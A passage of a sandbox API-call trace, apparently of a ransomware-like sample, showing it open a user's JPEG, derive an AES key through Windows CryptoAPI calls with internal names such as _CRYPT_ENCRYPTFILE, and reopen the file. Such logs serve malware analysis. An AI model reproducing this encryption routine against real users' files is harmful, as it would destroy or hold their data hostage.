hHeap=0x8a0000) returned 1 [0191.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0191.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0191.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.811] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0191.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd3f0 [0191.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd3f0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0191.812] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zvog.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0191.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0191.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0191.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0191.813] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.813] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0191.813] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0191.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0191.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0191.813] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0191.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0191.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.813] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.813] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0191.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0191.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5b8 [0191.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd5b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0191.814] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.814] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0191.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0191.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0191.814] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0191.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0191.814] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0191.814] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0191.814] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0191.815] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0191.815] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0191.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.815] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.815] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.815] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.815] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3be77fc0, ftCreationTime.dwHighDateTime=0x1d5e67f, ftLastAccessTime.dwLowDateTime=0xf87ced70, ftLastAccessTime.dwHighDateTime=0x1d5e385, ftLastWriteTime.dwLowDateTime=0xf87ced70, ftLastWriteTime.dwHighDateTime=0x1d5e385, nFileSizeHigh=0x0, nFileSizeLow=0x11ae2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="zvOG.jpg", cAlternateFileName="")) returned 0x90add8 [0191.815] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.815] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.815] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3be77fc0, ftCreationTime.dwHighDateTime=0x1d5e67f, ftLastAccessTime.dwLowDateTime=0xf87ced70, ftLastAccessTime.dwHighDateTime=0x1d5e385, ftLastWriteTime.dwLowDateTime=0xf87ced70, ftLastWriteTime.dwHighDateTime=0x1d5e385, nFileSizeHigh=0x0, nFileSizeLow=0x11ae2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="zvOG.jpg", cAlternateFileName="")) returned 0x90add8 [0191.816] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.816] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\zvOG.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.817] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.817] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0191.818] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0191.818] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.818] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.826] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.826] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.826] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.826] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.826] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3be77fc0, ftCreationTime.dwHighDateTime=0x1d5e67f, ftLastAccessTime.dwLowDateTime=0xf87ced70, ftLastAccessTime.dwHighDateTime=0x1d5e385, ftLastWriteTime.dwLowDateTime=0xf87ced70, ftLastWriteTime.dwHighDateTime=0x1d5e385, nFileSizeHigh=0x0, nFileSizeLow=0x11ae2, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="zvOG.jpg", cAlternateFileName="")) returned 0x90ae18 [0191.827] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0191.827] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.827] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.827] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.827] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.827] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0191.827] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.827] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0191.827] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.827] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.827] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0191.828] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.828] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.828] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0191.829] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0191.829] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.829] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0191.829] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.829] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.829] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.829] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.829] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.829] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.829] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0191.830] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0191.830] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0191.830] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.830] CryptHashData (hHash=0x90af58, pbData=0x8dec68, dwDataLen=0x19, dwFlags=0x1) returned 1 [0191.830] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0191.830] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0191.830] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.830] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0191.831] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0191.831] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.831] CryptDestroyHash (hHash=0x90af58) returned 1 [0191.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zvog.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0191.832] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.832] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0191.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0191.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0191.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 